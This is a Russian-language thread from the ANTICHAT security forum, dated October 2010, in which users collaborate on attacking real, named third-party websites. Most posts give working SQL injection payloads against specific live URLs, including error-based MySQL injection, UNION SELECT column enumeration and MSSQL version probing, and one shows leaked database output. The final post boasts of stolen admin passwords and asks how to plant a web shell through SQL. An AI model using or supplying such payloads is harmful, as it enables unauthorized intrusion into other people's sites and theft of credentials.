HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15231  
Старый 05.10.2010, 21:11
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

хэлп помогтие раскрутить

http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777'

http://www.ncm.org.uk/news.asp?id=1'

http://www.yakutproekt.ru/news.php?id=14517'

http://www.lpem.org/index.php?mn=6&sb=9&id=9'&act=detail
 
Ответить с цитированием

  #15232  
Старый 05.10.2010, 21:14
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.ncm.org.uk/news.asp?id=1+and+1=(select+top+1+table_name+from+ information_schema.tables)

дальше сам
 
Ответить с цитированием

  #15233  
Старый 05.10.2010, 21:19
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Цитата:
Сообщение от pinch  
pinch said:
хэлп помогтие раскрутить
http://www.lpem.org/index.php?mn=6&sb=9&id=9'&act=detail
http://www.lpem.org/index.php?mn=6&sb=9&id=9%20or%201%20group%20by%20c oncat(version(),floor(rand(0)*2))having%20min(0)%20or%201--%201&act=detail

Если не знаешь как дальше, то пиши в ПМ
 
Ответить с цитированием

  #15234  
Старый 05.10.2010, 21:20
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от -PRIVAT-  
-PRIVAT- said:
http://www.lpem.org/index.php?mn=6&sb=9&id=9%20or%201%20group%20by%20c oncat(version(),floor(rand(0)*2))having%20min(0)%20or%201--%201&act=detail
Если не знаешь как дальше, то пиши в ПМ
http://www.lpem.org/index.php?mn=6&sb=9&id=9+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--&act=detail

mm?
 
Ответить с цитированием

  #15235  
Старый 05.10.2010, 21:21
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
http://www.lpem.org/index.php?mn=6&sb=9&id=9+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--&act=detail
mm?
мм... можно и так
 
Ответить с цитированием

  #15236  
Старый 05.10.2010, 21:22
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

чуваки в том то и дело что FROM никак не вставишь=((

хотел станд. методом

так уж быть

http://www.lpem.org/index.php?mn=6&sb=9&id=9+and+%28select+1+from+%28s elect+count%280%29,concat%28%28select+version%28%2 9%29,floor%28rand%280%29*2%29%29+from+information_ schema.tables+group+by+2%29a%29--&act=detail

Duplicate entry '5.1.50-log1' for key 'group_key'
 
Ответить с цитированием

  #15237  
Старый 05.10.2010, 21:26
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

http://www.yakutproekt.ru/news.php?id=14517'

вот это надо ....
 
Ответить с цитированием

  #15238  
Старый 05.10.2010, 21:30
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от pinch  
pinch said:
http://www.yakutproekt.ru/news.php?id=14517'
вот это надо ....
тут точно не мускул, думаю ms_sql, но не скажу почему )

21 столбцов но селект не робит.

если есть желание копай дальше
 
Ответить с цитированием

  #15239  
Старый 05.10.2010, 21:36
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

ну да, mssql

http://www.yakutproekt.ru/news.php?id=14517+and+len(@@version)=len(@@version )

4-ый сайт вообще не открывается без ошибки..
 
Ответить с цитированием

  #15240  
Старый 06.10.2010, 03:04
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Выдрал лоигины и пассы админов на отдном сайте...

Попал в админку) в админке написанно Extasy CMS for site.ru

Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос

и доступен html

мб как то можно залить шел с помощью sql запроса?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ